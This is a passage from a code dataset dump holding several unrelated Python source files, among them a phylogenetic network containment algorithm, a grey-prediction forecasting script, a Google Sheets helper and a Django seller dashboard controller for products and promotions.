display_name=display_name,\n sanger_recipients=sanger_recipients\n )\n except Exception as e:\n LOG.warning(e)\n raise click.Abort()\n","repo_name":"Clinical-Genomics-Lund/scout","sub_path":"scout/commands/load/institute.py","file_name":"institute.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"37186061488","text":"import networkx as nx\nimport ast\nimport os\nimport sys\nimport re\nimport time\n\n##PARAMETERS\nfilename = None\nedges = False\n##\n\n\n\n###############################2. I/O############################\noption_help = False\ni = 1\nwhile i < len(sys.argv):\n arg= sys.argv[i]\n if arg == \"-f\" or arg == \"--filename\":\n i+=1\n filename = str(sys.argv[i])\n if arg == \"-e\" or arg == \"--edges\":\n edges = True\n if arg == \"-h\" or arg == \"--help\":\n option_help = True\n i += 1\n\nif len(sys.argv)==1 or option_help:\n print(\"Mandatory arguments:\\n -f or --filename The file containing two networks \\n\\nOptional arguments:\\n -e or --edges if the input file contains a list of edges in the form [(x1,y1),...,(xn,yn)] with xi and yi integers or strings in the form \\\"string\\\". 
If this option is not selected, the input is assumed to consist of two newick strings.\")\n sys.exit()\n\n################################################################################\n################################################################################\n################################################################################\n######## #############\n######## Newick Parsing #############\n######## #############\n################################################################################\n################################################################################\n################################################################################\n\n\n# Takes an extended newick string and returns a network\ndef Newick_To_Network(newick):\n #Processing the newick string so it represents a tree, where the tips are the leaves and the reticulation nodes of the network \n newick = newick[:-1]\n newick = newick.replace(\"(\", \"[\")\n newick = newick.replace(\")\", \"]\")\n newick = re.sub(r\"\\]\\#H([\\d]+)\", r\",#R\\1]\", newick)\n newick = re.sub(r\"#([RH])([\\d]+)\", r\"'#\\1\\2'\", newick)\n #Parsing the proccessed string as a list of lists\n nestedtree = ast.literal_eval(newick)\n #Converting the list of lists to a set of edges with root node 1\n edges, leaves, label_set, current_node = NestedList_To_Tree(nestedtree, 1)\n #Add a root edge (0,1)\n edges.append([0, 1])\n ret_labels = dict()\n leaf_labels = dict()\n for l in leaves:\n #leaves are strings, check if they are reticulation nodes\n if len(l) > 2 and (l[:2] == \"#H\" or l[:2] == \"#R\"):\n ret_labels[l[2:]] = []\n else:\n leaf_labels[l] = []\n for l in label_set:\n if len(l[0]) > 2 and (l[0][:2] == \"#H\" or l[0][:2] == \"#R\"):\n if l[0][1] == 'H':\n ret_labels[l[0][2:]] += [l[1]]\n else:\n ret_labels[l[0][2:]] = [l[1]] + ret_labels[l[0][2:]]\n else:\n leaf_labels[l[0]] += [l[1]]\n network = nx.DiGraph()\n network.add_edges_from(edges)\n #Merge corresponding reticulation nodes\n for retic in ret_labels:\n r = ret_labels[retic]\n receiving = r[0]\n parent_receiving = 0\n for p in network.predecessors(receiving):\n parent_receiving = p\n network.remove_node(receiving)\n for v in r[1:]:\n network.add_edge(v, parent_receiving)\n network = nx.contracted_edge(network, (v, parent_receiving))\n network.remove_edge(v, v)\n parent_receiving = v\n #Compute the leaves and their labels\n leaves = set()\n leaf_nodes = dict()\n for l in leaf_labels:\n leaf_labels[l] = leaf_labels[l][0]\n leaf_nodes[leaf_labels[l]] = l\n leaves.add(l)\n #Relabel the nodes\n for node in leaf_nodes:\n leaf_nodes[node] = \"L_\" + str(leaf_nodes[node])\n network = nx.relabel_nodes(network, leaf_nodes)\n #Return the network\n return network\n\n# Subroutine of Newick_To_Network, takes a tree in the form of a nested list, and returns a set of edges with nodes starting at (int) next_node\ndef NestedList_To_Tree(nestedList, next_node):\n edges = []\n leaves = set()\n labels = []\n top_node = next_node\n current_node = next_node + 1\n for t in nestedList:\n edges.append((top_node, current_node))\n if type(t) == list:\n extra_edges, extra_leaves, extra_labels, current_node = NestedList_To_Tree(t, current_node)\n else:\n extra_edges = []\n extra_leaves = set([str(t)])\n extra_labels = [[str(t), current_node]]\n current_node += 1\n edges = edges + extra_edges\n leaves = leaves.union(extra_leaves)\n labels = labels + extra_labels\n return edges, leaves, labels, 
current_node\n\n\n\n################################################################################\n################################################################################\n################################################################################\n######## #############\n######## Cherry Picking #############\n######## #############\n################################################################################\n################################################################################\n################################################################################\n\n\n#Algorithm 1\ndef FindRP2nd(N, x):\n lst = list()\n for p in N.predecessors(x):\n if N.in_degree(p) == 1:\n for cp in N.successors(p):\n if cp != x:\n t = N.out_degree(cp)\n if t == 0:\n lst.append((cp, x))\n if t == 1:\n for ccp in N.successors(cp):\n if N.out_degree(ccp) == 0:\n lst.append((ccp,x))\n return lst\n\n#algorithm 2\ndef FindRP1st(N, x):\n lst = list()\n for p in N.predecessors(x):\n if N.out_degree(p) == 1:\n for g in N.predecessors(p):\n for cg in N.successors(g):\n if cg != p:\n if N.out_degree(cg) == 0:\n lst.append((x, cg))\n return lst\n\n\n#Checks if two nodes form a cherry (1) or reticulated cherry (2), returns False otherwise\n#Not in the paper\ndef CheckCherry(N, x, y):\n if N.has_node(x) and N.has_node(y):\n px = None\n py = None\n for parent in N.predecessors(x):\n px = parent\n for parent in N.predecessors(y):\n py = parent\n if px == py:\n return 1\n if N.out_degree(px) == 1 and px in N.successors(py):\n return 2\n return False\n\n\n#Algorithm 3\ndef ReducePair(N, x, y):\n k = CheckCherry(N, x, y)\n if k == 1:\n for px in N.predecessors(x):\n N.remove_node(x)\n for ppx in N.predecessors(px):\n N.remove_node(px)\n N.add_edge(ppx,y)\n return True\n if k == 2:\n for px in N.predecessors(x):\n for py in N.predecessors(y):\n N.remove_edge(py,px)\n if N.in_degree(px) == 1:\n for ppx in N.predecessors(px):\n N.add_edge(ppx, x)\n N.remove_node(px)\n #if N.out_degree(py) == 1:\n for ppy in N.predecessors(py):\n N.add_edge(ppy, y)\n N.remove_node(py)\n return True\n return False\n\n\n#Algorithm 4\ndef FindTCS(N):\n lst1 = list()\n for x in N.nodes():\n if N.out_degree(x) == 0:\n cherry1 = FindRP2nd(N,x)\n lst1.extend(cherry1)\n lst2 = list()\n while lst1:\n cherry = lst1.pop()\n k = CheckCherry(N, *cherry)\n if (k == 1) or (k == 2):\n ReducePair(N, *cherry)\n lst2.append(cherry)\n lst1.extend(FindRP2nd(N,cherry[1]))\n lst1.extend(FindRP1st(N,cherry[1]))\n return lst2\n\n\n#Algorithm 5\ndef CPSReducesNetwork(N, lst):\n for cherry in lst:\n ReducePair(N, *cherry)\n if N.size() == 1:\n return True\n return False\n\n\n#Algorithm 6\ndef TCNContains(N, M):\n return CPSReducesNetwork(M,FindTCS(N))\n\n \n\n####################################################\n####################################################\n####################################################\n############# #############\n############# MAIN #############\n############# #############\n####################################################\n####################################################\n####################################################\n\n\ntest = open(filename, \"r\")\nline1 = test.read()\nline1 = line1.split(\"\\n\")\ntest.close()\nif edges:\n N = nx.DiGraph()\n M = nx.DiGraph()\n N.add_edges_from(ast.literal_eval(line1[0]))\n M.add_edges_from(ast.literal_eval(line1[1]))\nelse:\n N = Newick_To_Network(line1[0])\n M = Newick_To_Network(line1[1])\n\nstart = time.time()\ncontains = TCNContains(N, M)\nend = 
time.time()\nrunningTime = end-start;\nprint(\"First network contains second: \"+ str(contains))\nprint(\"Determined in time: \"+ str(runningTime))\n","repo_name":"RemieJanssen/Cherry-picking_TC_Network_Containment","sub_path":"NetworkContainment.py","file_name":"NetworkContainment.py","file_ext":"py","file_size_in_byte":9354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71935635743","text":"import unittest\n\nfrom cros.factory.test.pytests import keyboard\nfrom cros.factory.utils import schema\n\n\nclass KeyboardUnitTest(unittest.TestCase):\n\n def testValidDataWithKeymapSchema(self):\n valid_data = [{\n \"0\": \"1\"\n }, {\n \"0b1\": \"0b1\"\n }, {\n \"0o1\": \"0o1\"\n }, {\n \"0x1\": \"0x1\"\n }]\n for data in valid_data:\n try:\n # pylint: disable=protected-access\n self.assertEqual(None,\n keyboard._REPLACEMENT_KEYMAP_SCHEMA.Validate(data))\n except Exception as err:\n raise Exception('data is not valid: %r' % data) from err\n\n def testInvalidDataWithKeymapSchema(self):\n invalid_data = [{\n \"x\": \"1\"\n }, {\n \"01\": \"1\"\n }, {\n 1: \"1\"\n }, {\n \"1\": \"x\"\n }, {\n \"1\": \"01\"\n }, {\n \"1\": 1\n }]\n for data in invalid_data:\n try:\n # pylint: disable=protected-access\n self.assertRaisesRegex(schema.SchemaException, '^.*$',\n keyboard._REPLACEMENT_KEYMAP_SCHEMA.Validate,\n data)\n except Exception as err:\n raise Exception('data is not invalid: %r' % data) from err\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"arccode/factory","sub_path":"py/test/pytests/keyboard_unittest.py","file_name":"keyboard_unittest.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"20293483117","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 6 22:31:32 2020\n\n@author: LiSunBowen\n\"\"\"\n\nimport numpy as np\nfrom numpy.linalg import *\nimport math\nimport matplotlib.pyplot as plt\ny = np.array(eval(input('请输入数据:'))) # 原始数列 y\npv = eval(input('预测值个数:') or '2')+1\nn = len(y)\nyy = np.ones((n,1))\nyy[0] = y[0]\nfor i in range(1,n):\n yy[i] = yy[i-1] + y[i] # 对原数列y进行累加\nB = np.ones((n-1,2))\nfor i in range(0,n-1):\n B[i][0] = - (yy[i] + yy[i+1])/2 # 对yy做紧邻均值生成\n B[i][1] = 1\n # B为数据矩阵\nBT = B.T\nyn = np.ones((n-1,1))\nfor j in range(0,n-1):\n yn[j] = y[j+1]\nA = np.dot(np.dot(inv(np.dot(BT,B)),BT),yn) # 最小二乘法\na = A[0] # 发展系数\nu = A[1] # 灰作用量\nt = u/a\ni = np.array([i for i in range(n+pv)]) #pv=3\nyys = []\nfor j in range(len(i)):\n yys = (y[0]-t)*np.array([math.exp(-a*j) for j in i])+t # 预测后续数据,也称响应序列\n yys[0] = 1\nyys[0] = y[0] # 后续数据\nys=[i for i in range(n+pv-1)] # 准备好还原数据的列表\nfor j in range(n+pv-2,0,-1):\n ys[j] = yys[j] - yys[j-1] # 对yys做累减还原,生成预测值\nys[0] = y[0]\n\n# 预测完毕,开始检验\nx = [i for i in range(1,n+1)]\nxs = [i for i in range(2,n+pv)]\nyn = ys[1:n+pv] # 截取2至末项\ndet = 0\nsum1 = 0\nsumpe = 0\nfor i in range(n):\n sumpe = sumpe+y[i]\npe = sumpe/n # 原序列均值\nfor i in range(n):\n sum1= sum1+(y[i]-pe)**2 # 原序列方差\ns1 = math.sqrt(sum1/n) # 原序列标准差\nsumce = 0\nh = ys[:len(y)]\neps = h - y\n# 相对残差Q检验\ndelta = abs(eps/y)\nQ = delta.mean()\n# 方差比C检验\nC = eps.std()/y.std()\n# 小误差概率P检验\nS1 = y.std()\ntemp = np.sum((abs(eps-eps.mean()) < 0.6745 * S1) == True)\nP = temp/n\n# 后验差比值检验\nfor i in range(1,n):\n sumce = sumce+(y[i]-yn[i])\nce = sumce/(n-1)\nsum2 = 0;\nfor i in range(1,n):\n sum2 = sum2+(y[i]-yn[i]-ce)**2;\ns2 = math.sqrt(sum2/(n-1))\nc = s2/s1\nprint('\\n>> 残差 Q = {:.5f}'.format(Q))\nprint('>> 方差比 
C = {:.5f}'.format(C))\nprint('>> P检验:{:.3f}'.format(P))\nprint('>> 后验差比值 = {:.5f}'.format(c))\nif c < 0.35:\n print('\\n===系统预测精度好!===')\nelif c < 0.5:\n print('===系统预测精度合格!===')\nelif c < 0.65:\n print('===系统预测精度勉强!===')\nelse:\n print('===系统预测精度不合格!===')\nprint('\\n下个拟合值为 %.3f'%ys[n])\nprint('再下个拟合值为 %.3f'%ys[n+1])\nprint('全部拟合值为:\\n',ys[n:])\nplt.plot(x,y,linestyle='',color = 'red',marker='D')\nplt.plot(xs,yn,linestyle='--',color = 'green')\nplt.rcParams['font.sans-serif'] = ['Microsoft YaHei']\nplt.title('灰色预测曲线')\nplt.grid()\nplt.show()\n","repo_name":"Aegis1863/My_mathematical_Modeling","sub_path":"灰色预测/灰色预测.py","file_name":"灰色预测.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"18933357251","text":"from oauth2client.service_account import ServiceAccountCredentials\nimport gspread\nfrom pprint import pprint\nimport pandas as pd\nfrom googleapiclient.discovery import build\n\n\ndef createAccount(keysfile):\n\tscope = [\"https://www.googleapis.com/auth/spreadsheets\", \"https://www.googleapis.com/auth/drive\"]\n\tcredentials = ServiceAccountCredentials.from_json_keyfile_name(keysfile, scope)\n\tservice = build('sheets', 'v4', credentials=credentials)\n\tclient = gspread.authorize(credentials)\n\treturn client, service\n\ndef add_data(keysfile, title, project, data):\n\tclient, service = createAccount(keysfile)\n\tgsheet = client.open(title)\n\tservice.spreadsheets().values().append(\n\t spreadsheetId = gsheet.id,\n\t range = \"{}!A:Z\".format(project),\n\t body = {\n\t\t \"majorDimension\": \"ROWS\",\n\t\t \"values\": data\n\t\t \t},\n\t\t \tvalueInputOption=\"USER_ENTERED\"\n\t\t \t\t).execute()\n\nif __name__ == '__main__':\n\tdata = [\n\t\t\t['user', 'work type', 'hour', 'date'],\n\t\t\t['A', 'A', 'A', 'A'],\n\t\t\t['B', 'B' ,'B' ,'B']\n\t\t\t]\n\tkeysfile = 'D:/scripts/gsheet/key/credentials.json'\n\ttitle = 'Boss' # gsheet name\n\tproject = 'Himmapan' # worksheet name\n\tadd_data(keysfile, title, project, data)","repo_name":"Itsadasomnark/gsheet","sub_path":"add_data_gsheet.py","file_name":"add_data_gsheet.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71878242815","text":"import numpy as np\nfrom scipy import signal\nfrom joblib import Parallel, delayed\n\ndef normalize(data):\n data = data.astype(np.float)\n data -= data.mean()\n print(data.std())\n data /= data.std()\n return data\n\ndef normalize_mat(data):\n return np.array([normalize(v) for v in data])\n\n\nwave_size = 4800\ntrain_traces = np.fromfile('./trace/AES_TI_wave_mask_v4_test', np.uint8)\ntrain_traces = train_traces.reshape(-1, wave_size)\ntrain_traces = np.array(Parallel(n_jobs = 32, verbose=3)([delayed(signal.decimate)(v,2) for v in train_traces]))\nprint(train_traces.shape)\nnp.save(\"./trace/AES_TI_wave_mask_v4_test_down2\",train_traces)","repo_name":"kojima0615/Research_Bachelor","sub_path":"makedata/to_npy.py","file_name":"to_npy.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41355962625","text":"a=int(input((\"Enter total numbers\\n\")))\r\nnums=list(map(int,input().split(\" \")))\r\n'''fir=nums[0]\r\nres=[]\r\ncount=0\r\nfor i in nums:\r\n if(i!=fir):\r\n fir=i\r\n res.append(i)\r\n else:\r\n count+=1\r\n if(count<=1):\r\n 
res.append(i)\r\nprint(res)\r\n'''\r\nv=set(nums)\r\nprint(list(v))","repo_name":"SpAshish54/Python","sub_path":"duplicates.py","file_name":"duplicates.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33526887096","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport sys\nimport os\n\nfrom sys import argv\n\nINFILE=argv[1]\nTHRESHOLD=int(argv[2])\nTAIL = int(argv[3]) if len(argv) == 4 else None\nFREQ = float(os.environ[\"FREQ\"]) if \"FREQ\" in os.environ else None\n\ndata = []\nrejected = 0\n\nwith open(INFILE, 'r') as f:\n for line in f.readlines():\n if \"fast: \" in line:\n rejected = int(line.split()[1])\n\n else:\n data.append(int(line.strip()))\n\ndata += [THRESHOLD] * rejected\n\nif FREQ is not None:\n data = [d * FREQ / 1000. for d in data]\n\ndef generate_points(tail):\n if tail is not None:\n ps = np.arange(101) * TAIL / 100\n ps = np.array(list(map(lambda n: 100. - 10. ** (2. - n), ps)))\n return ps\n\n else:\n return np.arange(101)\n\nps = generate_points(TAIL)\npercentiles = np.percentile(data, ps)\n\nprint(\"none(%d)\" % len(data), \" \".join(map(lambda p: str(p), percentiles)))\n","repo_name":"multifacet/cbmm-artifact","sub_path":"scripts/bpf-pftrace-percentiles.py","file_name":"bpf-pftrace-percentiles.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"79"} +{"seq_id":"74476833215","text":"from . import models\nfrom adminSide import models as admin_models\nfrom loginSys import models as fk_user_main\nfrom django.contrib.auth.models import User as user_main\nfrom django.core.files.storage import FileSystemStorage\nimport os\nfrom datetime import datetime\nimport requests as rq\nimport base64 as enc\nimport json\n\n# ---------------Reguler def functions -------------------------\ndef get_cat_list():\n\tcategory_list = []\n\tCat = admin_models.category.objects.all()\n\tfor x in range(len(Cat)):\n\t\tcategory_list.append([Cat[x].name, Cat[x].id])\n\treturn category_list\n\ndef get_promo_list(request):\n\tt_promo_list = []\n\tt_promo = models.promo.objects.filter(seller = user_main.objects.get(username = request.user))\n\tfor x in range(len(t_promo)):\n\t\t\tt_promo_list.append([t_promo[x].name, t_promo[x].id])\n\treturn t_promo_list\n\ndef get_promo_cat_list():\n\tcat_promo_list = []\n\tCat_promo = admin_models.promo_type.objects.all()\n\tfor x in range(len(Cat_promo)):\n\t\tcat_promo_list.append([Cat_promo[x].name, Cat_promo[x].id])\n\treturn cat_promo_list\n\ndef upload_img (request):\n\tfile = request.FILES.getlist('img')\n\tfs = FileSystemStorage()\n\t# Mengatasi upload multiple file\n\tfile_name = ''\n\tfor x in range(len(file)):\n\t\t# System upload pada local storage\n\t\t# upload = fs.save(file[x].name, file[x])\n\t\t# name = str(fs.url(upload)).split('/')\n\t\t# file_name += name[2] + '^!@!^'\n\t\t# System upload pada server storage\n\t\t\n\t\tdata = {\"file\":enc.b64encode(file[x].open(\"rb\").read())}\n\t\t# print(data)\n\t\turl = \"https://f-storage.000webhostapp.com/index.php?insert=true&type=png\"\n\t\tresponse = rq.request('POST', url, data = data)\n\t\tif response.status_code == 200 or response.status_code == '200':\n\t\t\tjsonResponse = json.loads(json.dumps(response.json()))\n\t\t\tprint(jsonResponse['filename']+jsonResponse['type'])\n\t\t\ttmpName = jsonResponse['filename']+\".\"+jsonResponse['type']\n\t\t\tfile_name += tmpName + '^!@!^'\n\t\t# 
print(file[x].open(\"rb\").read())\n\t\t\n\treturn file_name\n\ndef delete_img (request, class_model = models.stuff.objects):\n\tfile_name = request.GET.get('del')\n\t# get nama file di db\n\tif request.GET.get('id') != None :\n\t\tid_stuff = request.GET.get('id')\n\t\t# object untuk digunakan edit data\n\t\tstuff_obj = class_model.get(id = id_stuff)\n\t\tgetFileName = str(stuff_obj.img_file).split('^!@!^')\n\t\tnew_file_name = ''\n\t\tfor x in range(len(getFileName)):\n\t\t\tif str(getFileName[x]) != str(file_name) and str(getFileName[x]) != '':\n\t\t\t\tnew_file_name += getFileName[x]+'^!@!^'\n\t\t\telif str(getFileName[x]) == str(file_name):\n\t\t\t\turl = \"https://f-storage.000webhostapp.com/index.php?delete=\"+getFileName[x]\n\t\t\t\tresponse = rq.request('GET', url)\n\t\t\t\tprint(response.json())\n\t\t\t\t# try:\n\t\t\t\t# \t# dir_name = 'media/'+getFileName[x]\n\t\t\t\t# \t# os.remove(dir_name)\n\n\t\t\t\t# except Exception as e:\n\t\t\t\t# \tprint(e,'\\n')\n\t\tstuff_obj.img_file = new_file_name\n\t\tstuff_obj.save()\n\telse:\n\t\tprint('Gagal menghapus. request tidak sesuai\\n')\n\ndef get_photo_profile(fk_user):\n\tobj = fk_user_main.user_sec.objects.get(fk_id_user = fk_user)\n\treturn obj.Photo\n\n# ------------ untuk kontrol produk view page dan view detail page -------\ndef view_product (request, id_data = 0):\n\tdata_product = ''\n\ttry:\n\t\tif id_data == 0:\n\t\t\tdata_product = models.stuff.objects.filter(seller = request.user)\n\t\telse:\n\t\t\tdata_product = models.stuff.objects.filter(seller = request.user, id = id_data)\n\texcept Exception as e:\n\t\tprint(e,'\\n')\n\t\treturn [], []\n\n\tlistID = []\n\tlistView = []\n\n\tfor x in range(len(data_product)):\n\t\tobj_post = models.products_post.objects.get(stuff_fk = data_product[x])\n\t\tlistID.append(data_product[x].id)\n\t\tID = data_product[x].id\n\t\tname = data_product[x].name\n\t\tdesc = data_product[x].desc\n\t\timg_dir = data_product[x].img_file.split('^!@!^')\n\t\timg_field = data_product[x].img_file\n\t\tstate = data_product[x].state\n\t\tstock = data_product[x].count\n\t\tprice = data_product[x].price\n\t\tlocation = data_product[x].location\n\t\tquality = data_product[x].quality\n\t\t# untuk mendapatkan category\n\t\tcategory = admin_models.category.objects.get(name = data_product[x].stuff_cat).name\n\t\t# unutk dapatkan promo\n\t\tpromo = models.promo.objects.filter(name = data_product[x].stuff_promo)[0].name\n\n\t\ttmp = [ID, name, desc, img_dir, state, stock, price, category, promo, img_field, location, range(0,quality), obj_post.ship_cost, obj_post.note]\n\n\t\t# tmp = [ID, name, desc, img_dir, state, stock, price, category, promo, img_field, location, range(0,quality), obj_post.ship_cost, obj_post.note]\n\n\t\tlistView.append(tmp)\n\n\treturn listView, listID\n\ndef for_modal_choice (request):\n\t# Mendapatkan list option dari table FK untuk addStuff\n\tcategory_list = get_cat_list()\n\tt_promo_list = get_promo_list(request)\n\n\treturn category_list, t_promo_list\n\ndef addStuff (request):\n\tif request.POST.get('add_stuff') != None:\n\t\tname = request.POST['name']\n\t\tstate = request.POST['state']\n\t\tprice = request.POST['price']\n\t\tstock = request.POST['stock']\n\t\tdesc = request.POST['desc']\n\t\tloc = request.POST['location']\n\t\tstuff_cat = admin_models.category.objects.get(id = request.POST['cat'])\n\t\tstuff_promo = models.promo.objects.get(id = request.POST['promo'])\n\t\tseller = user_main.objects.get(username = request.POST['id_seller'])\n\t\tship_cost = 
request.POST.get('ship_cost')\n\t\tnote = request.POST.get('note')\n\t\t# File type\n\t\timg_dir = upload_img(request)\n\n\t\tif len(img_dir) > 255:\n\t\t\timg_dir = ''\n\n\t\tadd = models.stuff(\n\t\t\tname = name,\n\t\t\tstate = state,\n\t\t\tprice = price,\n\t\t\tcount = stock,\n\t\t\tdesc = desc,\n\t\t\timg_file = img_dir,\n\t\t\tquality = 0,\n\t\t\tlocation = loc,\n\t\t\tstuff_cat = stuff_cat,\n\t\t\tstuff_promo = stuff_promo,\n\t\t\tseller = seller\n\t\t\t)\n\t\tadd.save() \n\n\t\tadd_sec = models.products_post(\n\t\t\tdate = datetime.now().date(),\n\t\t\tnote = note,\n\t\t\tship_cost = ship_cost,\n\t\t\t# FK\n\t\t\tstuff_fk = models.stuff.objects.get(name = name,\n\t\t\t\tstate = state,\n\t\t\t\tprice = price,\n\t\t\t\tcount = stock,\n\t\t\t\tdesc = desc,\n\t\t\t\timg_file = img_dir,\n\t\t\t\tquality = 0,\n\t\t\t\tlocation = loc,\n\t\t\t\tstuff_cat = stuff_cat,\n\t\t\t\tstuff_promo = stuff_promo,\n\t\t\t\tseller = seller)\n\t\t\t)\n\t\tadd_sec.save()\n\n\telse:\n\t\tprint('Tidak ada request add_stuff')\n\ndef editStuff (request):\n\tif request.POST.get('edit_stuff') != None:\n\t\tid_stuff = request.POST['id']\n\t\tname1 = request.POST['name']\n\t\tstate1 = request.POST['state']\n\t\tprice1 = request.POST['price']\n\t\tstock1 = request.POST['stock']\n\t\tdesc1 = request.POST['desc']\n\t\tloc1 = request.POST['location']\n\t\tstuff_cat1 = admin_models.category.objects.get(id = request.POST['cat'])\n\t\tstuff_promo1 = models.promo.objects.get(id = request.POST['promo'])\n\t\tseller1 = user_main.objects.get(username = request.POST['id_seller'])\n\n\t\tstuff_obj = models.stuff.objects.get(seller = user_main.objects.get(username = request.user), id = id_stuff)\n\t\t\n\t\t# id_post = request.POST.get('id_sec')\n\t\tship_cost = request.POST.get('ship_cost')\n\t\tnote = request.POST.get('note')\n\n\t\tpost_obj = models.products_post.objects.get(stuff_fk = stuff_obj)\n\n\t\tif len(request.FILES.getlist('img')) != 0 :\n\t\t\tprint('Ono gambar e broo !!!\\n')\n\t\t\tprev_img = stuff_obj.img_file\n\t\t\timg_dir = upload_img(request)\n\n\t\t\timg_dir = img_dir + prev_img\n\n\t\t\tif len(img_dir) > 255:\n\t\t\t\timg_dir = prev_img\n\n\t\t\tstuff_obj.name = name1\n\t\t\tstuff_obj.state = state1\n\t\t\tstuff_obj.price = price1\n\t\t\tstuff_obj.count = stock1\n\t\t\tstuff_obj.desc = desc1\n\t\t\tstuff_obj.img_file = img_dir\n\t\t\tstuff_obj.location = loc1\n\t\t\tstuff_obj.stuff_cat = stuff_cat1\n\t\t\tstuff_obj.stuff_promo = stuff_promo1\n\t\t\tstuff_obj.seller = seller1\n\n\t\t\tstuff_obj.save()\n\n\t\t\tpost_obj.note = note\n\t\t\tpost_obj.ship_cost = ship_cost\n\n\t\t\tpost_obj.save()\n\n\t\telse:\n\t\t\tprint('Gak ono gambar e broo !!!\\n')\n\t\t\tstuff_obj.name = name1\n\t\t\tprint(name1,'\\n')\n\t\t\tstuff_obj.state = state1\n\t\t\tstuff_obj.price = price1\n\t\t\tstuff_obj.count = stock1\n\t\t\tstuff_obj.desc = desc1\n\t\t\tstuff_obj.location = loc1\n\t\t\tstuff_obj.stuff_cat = stuff_cat1\n\t\t\tstuff_obj.stuff_promo = stuff_promo1\n\t\t\tstuff_obj.seller = seller1\n\n\t\t\tstuff_obj.save()\n\n\t\t\tpost_obj.note = note\n\t\t\tpost_obj.ship_cost = ship_cost\n\n\t\t\tpost_obj.save()\n\n\telse:\n\t\tprint('Tidak ada request edit\\n')\n\ndef del_stuff_data(request):\n\tconfirm = True\n\tif request.GET.get('del_data') != None:\n\t\tdel_data = ''\n\t\ttry:\n\t\t\tdel_data = models.stuff.objects.get(id = request.GET.get('del_data'))\n\t\t\t# del_data_sec = models.products_post.objects.get(stuff_fk = del_data)\n\t\texcept Exception as e:\n\t\t\tprint(e,'\\n')\n\t\t\tconfirm = False\n\n\t\tif confirm 
== True:\n\t\t\t# img = del_data.img_file\n\t\t\t# img = str(img).split('^!@!^')\n\t\t\t# for x in range(len(img)):\n\t\t\t# \tif img[x] != '':\n\t\t\t# \t\ttry:\n\t\t\t# \t\t\tos.remove('media/'+img[x])\n\t\t\t# \t\texcept Exception as e:\n\t\t\t# \t\t\tprint(e,'\\n')\n\t\t\t# del_data_sec.delete()\n\t\t\t# del_data.delete()\n\t\t\tdel_data.state = 'deactive'\n\t\t\tdel_data.save()\n\t\treturn confirm\n\n\telse:\n\t\tprint('Tidak ada request HAPUS\\n')\n\t\treturn confirm\n\n# ------------------ KOntrol view promo dan edit promo ------------------\ndef view_promos(request, id_data = 0):\n\tdata_promos = ''\n\tlist_view = []\n\tif id_data == 0:\n\t\tdata_promos = models.promo.objects.filter(seller = request.user)\n\telse :\n\t\tdata_promos = models.promo.objects.filter(seller = request.user, id = id_data)\n\n\tfor x in range(len(data_promos)):\n\t\tID = data_promos[x].id\n\t\tname = data_promos[x].name\n\t\tstart_prm = str(data_promos[x].start_date)\n\t\tend_prm = str(data_promos[x].end_date)\n\t\tdesc = data_promos[x].desc\n\t\tval_prm = data_promos[x].value\n\t\tprm_type = data_promos[x].promo_type\n\t\tprm_icon = ''\n\n\t\tif prm_type.name == 'No Promo':\n\t\t\tprm_icon = 'img/no_promo.png'\n\t\telif prm_type.name == 'gratis_ongkir':\n\t\t\tprm_icon = 'img/ongkir-gratis.png'\n\t\telif prm_type.name == 'voucher_discount':\n\t\t\tprm_icon = 'img/voucher_dc.png'\n\t\telif prm_type.name == 'voucher_cashback':\n\t\t\tprm_icon = 'img/cashback.png'\n\t\t# print(prm_type.name)\n\t\ttmp = [ID, name, start_prm, end_prm, desc, val_prm, prm_type, prm_icon]\n\t\tlist_view.append(tmp)\n\n\treturn list_view\n\ndef add_promo(request):\n\tif request.POST.get('add_promo') != None:\n\t\tname = request.POST.get('name')\n\t\tst_date = request.POST.get('st')\n\t\tend = request.POST.get('end')\n\t\tdesc = request.POST.get('desc')\n\t\tval = request.POST.get('val')\n\t\tprm_type = admin_models.promo_type.objects.get(id = request.POST.get('tp_prm'))\n\t\tseller = user_main.objects.get(username = request.user)\n\n\t\tadd = models.promo(\n\t\t\tname = name,\n\t\t\tstart_date = st_date,\n\t\t\tend_date = end,\n\t\t\tdesc = desc,\n\t\t\tvalue = val,\n\t\t\tpromo_type = prm_type,\n\t\t\tseller = seller,\n\t\t\t)\n\t\tadd.save()\n\telse:\n\t\tprint('Tidak ada request POST add promo\\n') \n\ndef edit_promo(request):\n\tif request.POST.get('edit_promo') != None:\n\t\tID = request.POST.get('id')\n\t\tname = request.POST.get('name')\n\t\tst_date = request.POST.get('st')\n\t\tend = request.POST.get('end')\n\t\tdesc = request.POST.get('desc')\n\t\tval = request.POST.get('val')\n\t\tprm_type = admin_models.promo_type.objects.get(id = request.POST.get('tp_prm'))\n\t\tseller = user_main.objects.get(username = request.user)\t\t\n\n\t\tedit = models.promo.objects.get(seller = user_main.objects.get(username = request.user), id = ID)\n\n\t\tedit.name = name\n\t\tedit.start_date = st_date\n\t\tedit.end_date = end\n\t\tedit.desc = desc\n\t\tedit.value = val\n\t\tedit.promo_type = prm_type\n\t\tedit.seller = seller\n\n\t\tedit.save()\n\telse:\n\t\tprint('Tidak ada request EDIt data\\n')\n\ndef del_promo_data(request):\n\tconfirm = True\n\tif request.GET.get('del_data') != None:\n\t\tdel_data = ''\n\t\ttry:\n\t\t\tdel_data = models.promo.objects.get(id = request.GET.get('del_data'))\n\t\texcept Exception as 